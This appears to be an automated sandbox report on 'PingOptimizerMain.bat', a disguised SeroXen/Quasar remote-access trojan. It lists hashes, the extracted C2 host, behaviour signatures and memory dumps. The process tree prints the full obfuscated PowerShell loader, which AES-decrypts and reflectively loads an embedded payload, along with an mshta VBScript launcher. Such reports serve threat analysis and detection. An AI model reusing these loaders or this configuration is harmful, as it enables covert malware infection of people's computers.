Resubmissions

09-01-2024 11:27

240109-nkymhsgdcj 10

09-01-2024 11:03

240109-m5m6vaffdq 10

Analysis

  • max time kernel
    61s
  • max time network
    92s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-01-2024 11:03

General

  • Target

    PingOptimizerMain.bat

  • Size

    11.7MB

  • MD5

    ffc97bdf56ecbee34e263c88f330a9fd

  • SHA1

    7f83beb8534cdc3f3ee2147e74d6f698812f2859

  • SHA256

    d63b1658179ccc4b45c7f9726b83e32763850a046480b76a8f8920c709309b3e

  • SHA512

    09a9dbf6d13297a89ea4d1dbe56ae8f4485ecb832b8fe4cf302d805aa1077ed496e1e84024014ad2238b937fd09c21067112bf52aec373deaf4c20df51ae85c1

  • SSDEEP

    49152:zA8wtTTWxiw/n2WZfp8Nuw3PdwARNLfKu5LTEgwJt/eYr8ZLYY3GU80pJzgN5Vsi:X

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v3.0.6 | SeroXen

C2

amazon-nr.gl.at.ply.gg:56754

Mutex

a84ac298-1532-4b9d-a759-74f70b16a4b6

Attributes
  • encryption_key

    F28222E368B70A89947BE773CD2BA6F55AF0A35F

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Async RAT payload 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:688
    • C:\Windows\system32\winlogon.exe
      winlogon.exe
      1⤵
        PID:604
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:5116
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
          2⤵
          • Deletes itself
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1140
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo function JKKyH($CkPBl){ $vgKjD=[System.Security.Cryptography.Aes]::Create(); $vgKjD.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vgKjD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vgKjD.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('26aOJFwTv97uDv+AU5goDn6hWx02gD9NOcdrvlCWKTI='); $vgKjD.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('It4ny7WARKm8v2w/mmx4aw=='); $IogOR=$vgKjD.CreateDecryptor(); $return_var=$IogOR.TransformFinalBlock($CkPBl, 0, $CkPBl.Length); $IogOR.Dispose(); $vgKjD.Dispose(); $return_var;}function HyrXz($CkPBl){ $gYrBV=New-Object System.IO.MemoryStream(,$CkPBl); $DaoGF=New-Object System.IO.MemoryStream; Invoke-Expression '$YOItl #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$gYrBV,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $YOItl.CopyTo($DaoGF); $YOItl.Dispose(); $gYrBV.Dispose(); $DaoGF.Dispose(); $DaoGF.ToArray();}function LrqQP($CkPBl,$BYqCB){ $nHbiH = @( '$dWXPX = [System.#R#e#f#l#e#c#t#i#o#n#.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$CkPBl);'.Replace("#", ""), '$bnVJm = $dWXPX.EntryPoint;', '$bnVJm.Invoke($null, $BYqCB);' ); foreach ($bEYpH in $nHbiH) { Invoke-Expression $bEYpH };}$JVYeU=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat').Split([Environment]::NewLine);foreach ($gjKds in $JVYeU) { if ($gjKds.StartsWith('SIROXEN')) { $QeetH=$gjKds.Substring(7); break; }}$tkNud=HyrXz (JKKyH ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($QeetH)));LrqQP $tkNud (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat')); "
          2⤵
            PID:640
        • C:\Windows\$sxr-mshta.exe
          C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-DlMgztMMqWzEVacEgNiQ4312:gNDjzNZM=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
          1⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3940
          • C:\Windows\$sxr-cmd.exe
            "C:\Windows\$sxr-cmd.exe" /c %$sxr-DlMgztMMqWzEVacEgNiQ4312:gNDjzNZM=%
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2344
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo function Rluao($GATpr){ $zbUvP=[System.Security.Cryptography.Aes]::Create(); $zbUvP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zbUvP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zbUvP.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('Jvne7EqTDjJUxdhZ6WfQ6qFa+P92IqL9Im6fxubmiPg='); $zbUvP.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('t5Jzj2fl8QhbaUyRkJ3dow=='); $Bwqdi=$zbUvP.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $fRUkc=$Bwqdi.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($GATpr, 0, $GATpr.Length); $Bwqdi.Dispose(); $zbUvP.Dispose(); $fRUkc;}function PSYYc($GATpr){ $YXOVu=New-Object System.IO.MemoryStream(,$GATpr); $UjuqW=New-Object System.IO.MemoryStream; Invoke-Expression '$cPoob @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$YXOVu,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $cPoob.CopyTo($UjuqW); $cPoob.Dispose(); $YXOVu.Dispose(); $UjuqW.Dispose(); $UjuqW.ToArray();}function PkOpP($GATpr){ $fRUkc = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($GATpr); $fRUkc = Rluao($fRUkc); $fRUkc = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($fRUkc); return $fRUkc;}function execute_function($GATpr,$ZpOdX){ $dXLTQ = @( '$EQTGj = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::Load([byte[]]$GATpr);'.Replace('@', ''), '$zuJZD = $EQTGj.EntryPoint;', '$zuJZD.Invoke($null, $ZpOdX);' ); foreach ($htxYm in $dXLTQ) { Invoke-Expression $htxYm };}$OGwkk = PkOpP('Ddsfg+DubgptLKxYJOWSvg==');$pvzVw = PkOpP('qVKL5Ug8qrvHnpSvoJDFLWeq6BH6Nv5pdzoKtiMQD+s=');$SDKFb = PkOpP('WFuvx/6oMAg1+9D4fqqi6A==');$IVatZ = PkOpP('rkmtA5yUVqXZUFWW8Vi8kg==');if (@(get-process -ea silentlycontinue $IVatZ).count -gt 1) {exit};$YuMaQ = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($OGwkk).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($pvzVw);$ZVkMP=PSYYc (Rluao ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($YuMaQ)));execute_function $ZVkMP (,[string[]] ($SDKFb)); "
              3⤵
                PID:2912
              • C:\Windows\$sxr-powershell.exe
                C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
                3⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:568

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

            Filesize

            53KB

            MD5

            a26df49623eff12a70a93f649776dab7

            SHA1

            efb53bd0df3ac34bd119adf8788127ad57e53803

            SHA256

            4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

            SHA512

            e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kynwivea.dsc.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\$sxr-cmd.exe

            Filesize

            283KB

            MD5

            8a2122e8162dbef04694b9c3e0b6cdee

            SHA1

            f1efb0fddc156e4c61c5f78a54700e4e7984d55d

            SHA256

            b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

            SHA512

            99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

          • C:\Windows\$sxr-mshta.exe

            Filesize

            14KB

            MD5

            0b4340ed812dc82ce636c00fa5c9bef2

            SHA1

            51c97ebe601ef079b16bcd87af827b0be5283d96

            SHA256

            dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

            SHA512

            d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

          • C:\Windows\$sxr-powershell.exe

            Filesize

            442KB

            MD5

            04029e121a0cfa5991749937dd22a1d9

            SHA1

            f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

            SHA256

            9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

            SHA512

            6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          • memory/64-107-0x0000020ECF560000-0x0000020ECF587000-memory.dmp

            Filesize

            156KB

          • memory/64-104-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/404-158-0x0000023683F30000-0x0000023683F51000-memory.dmp

            Filesize

            132KB

          • memory/404-120-0x0000023683F60000-0x0000023683F87000-memory.dmp

            Filesize

            156KB

          • memory/404-118-0x0000023683F30000-0x0000023683F51000-memory.dmp

            Filesize

            132KB

          • memory/404-110-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/568-80-0x0000000180000000-0x0000000180007000-memory.dmp

            Filesize

            28KB

          • memory/568-89-0x0000023334D00000-0x0000023334D10000-memory.dmp

            Filesize

            64KB

          • memory/568-90-0x0000023334D00000-0x0000023334D10000-memory.dmp

            Filesize

            64KB

          • memory/568-130-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/568-106-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/568-76-0x000002331C980000-0x000002331C9A2000-memory.dmp

            Filesize

            136KB

          • memory/568-73-0x0000023358C20000-0x0000023358C68000-memory.dmp

            Filesize

            288KB

          • memory/568-72-0x0000023334D00000-0x0000023334D10000-memory.dmp

            Filesize

            64KB

          • memory/568-71-0x00007FF9A84B0000-0x00007FF9A8F71000-memory.dmp

            Filesize

            10.8MB

          • memory/568-70-0x0000023358B70000-0x0000023358C22000-memory.dmp

            Filesize

            712KB

          • memory/568-69-0x00000233587A0000-0x0000023358B66000-memory.dmp

            Filesize

            3.8MB

          • memory/568-66-0x0000023358040000-0x00000233587A0000-memory.dmp

            Filesize

            7.4MB

          • memory/568-65-0x0000023357B20000-0x000002335803C000-memory.dmp

            Filesize

            5.1MB

          • memory/568-64-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/568-46-0x00007FF9A84B0000-0x00007FF9A8F71000-memory.dmp

            Filesize

            10.8MB

          • memory/568-47-0x0000023334D00000-0x0000023334D10000-memory.dmp

            Filesize

            64KB

          • memory/568-63-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/568-62-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/568-61-0x00007FF9C6850000-0x00007FF9C690E000-memory.dmp

            Filesize

            760KB

          • memory/568-60-0x0000023357220000-0x0000023357816000-memory.dmp

            Filesize

            6.0MB

          • memory/604-83-0x000001ADA5CC0000-0x000001ADA5CE1000-memory.dmp

            Filesize

            132KB

          • memory/604-88-0x00007FF9C774D000-0x00007FF9C774E000-memory.dmp

            Filesize

            4KB

          • memory/604-85-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/604-139-0x000001ADA6240000-0x000001ADA6267000-memory.dmp

            Filesize

            156KB

          • memory/604-84-0x000001ADA6240000-0x000001ADA6267000-memory.dmp

            Filesize

            156KB

          • memory/604-86-0x000001ADA6240000-0x000001ADA6267000-memory.dmp

            Filesize

            156KB

          • memory/636-127-0x000001C5AACB0000-0x000001C5AACD7000-memory.dmp

            Filesize

            156KB

          • memory/636-119-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/636-162-0x000001C5AAC80000-0x000001C5AACA1000-memory.dmp

            Filesize

            132KB

          • memory/636-126-0x000001C5AAC80000-0x000001C5AACA1000-memory.dmp

            Filesize

            132KB

          • memory/688-145-0x000001C059480000-0x000001C0594A1000-memory.dmp

            Filesize

            132KB

          • memory/688-93-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/688-97-0x000001C0594B0000-0x000001C0594D7000-memory.dmp

            Filesize

            156KB

          • memory/700-121-0x0000029070370000-0x0000029070391000-memory.dmp

            Filesize

            132KB

          • memory/700-161-0x0000029070370000-0x0000029070391000-memory.dmp

            Filesize

            132KB

          • memory/700-123-0x00000290703A0000-0x00000290703C7000-memory.dmp

            Filesize

            156KB

          • memory/700-114-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/964-98-0x000002816AB20000-0x000002816AB47000-memory.dmp

            Filesize

            156KB

          • memory/964-100-0x00007FF9C774C000-0x00007FF9C774D000-memory.dmp

            Filesize

            4KB

          • memory/964-147-0x000002816AB20000-0x000002816AB47000-memory.dmp

            Filesize

            156KB

          • memory/964-99-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/1048-128-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/1048-131-0x0000017588370000-0x0000017588397000-memory.dmp

            Filesize

            156KB

          • memory/1140-25-0x000002551CCE0000-0x000002551CD38000-memory.dmp

            Filesize

            352KB

          • memory/1140-35-0x00000255027B0000-0x00000255027B6000-memory.dmp

            Filesize

            24KB

          • memory/1140-24-0x000002551CC40000-0x000002551CC90000-memory.dmp

            Filesize

            320KB

          • memory/1140-13-0x000002551CC90000-0x000002551CCD4000-memory.dmp

            Filesize

            272KB

          • memory/1140-10-0x00007FF9A84B0000-0x00007FF9A8F71000-memory.dmp

            Filesize

            10.8MB

          • memory/1140-14-0x000002551D120000-0x000002551D196000-memory.dmp

            Filesize

            472KB

          • memory/1140-15-0x0000025555400000-0x0000025555CA8000-memory.dmp

            Filesize

            8.7MB

          • memory/1140-5-0x000002551CBF0000-0x000002551CC12000-memory.dmp

            Filesize

            136KB

          • memory/1140-59-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/1140-75-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/1140-23-0x000002551DBD0000-0x000002551DC6C000-memory.dmp

            Filesize

            624KB

          • memory/1140-74-0x00007FF9A84B0000-0x00007FF9A8F71000-memory.dmp

            Filesize

            10.8MB

          • memory/1140-26-0x000002551D0A0000-0x000002551D0CC000-memory.dmp

            Filesize

            176KB

          • memory/1140-27-0x000002551AB70000-0x000002551AB80000-memory.dmp

            Filesize

            64KB

          • memory/1140-28-0x000002551AB70000-0x000002551AB80000-memory.dmp

            Filesize

            64KB

          • memory/1140-22-0x000002551D1A0000-0x000002551DBCC000-memory.dmp

            Filesize

            10.2MB

          • memory/1140-21-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/1140-11-0x000002551AB70000-0x000002551AB80000-memory.dmp

            Filesize

            64KB

          • memory/1140-58-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/1140-16-0x00007FF9C6850000-0x00007FF9C690E000-memory.dmp

            Filesize

            760KB

          • memory/1140-36-0x0000000180000000-0x0000000180007000-memory.dmp

            Filesize

            28KB

          • memory/1140-12-0x000002551AB70000-0x000002551AB80000-memory.dmp

            Filesize

            64KB

          • memory/1140-17-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/1140-19-0x00007FF9C76B0000-0x00007FF9C78A5000-memory.dmp

            Filesize

            2.0MB

          • memory/1140-20-0x00007FF9A84B0000-0x00007FF9A8F71000-memory.dmp

            Filesize

            10.8MB

          • memory/1160-138-0x0000024A23340000-0x0000024A23367000-memory.dmp

            Filesize

            156KB

          • memory/1160-134-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/1188-140-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/1188-141-0x00000224D6630000-0x00000224D6657000-memory.dmp

            Filesize

            156KB

          • memory/1196-146-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/1196-149-0x0000025CDF160000-0x0000025CDF187000-memory.dmp

            Filesize

            156KB

          • memory/1304-153-0x0000026361DD0000-0x0000026361DF7000-memory.dmp

            Filesize

            156KB

          • memory/1304-152-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/1364-157-0x00007FF987730000-0x00007FF987740000-memory.dmp

            Filesize

            64KB

          • memory/1364-160-0x000001DC0A760000-0x000001DC0A787000-memory.dmp

            Filesize

            156KB

          • memory/1372-170-0x00000249D4E60000-0x00000249D4E87000-memory.dmp

            Filesize

            156KB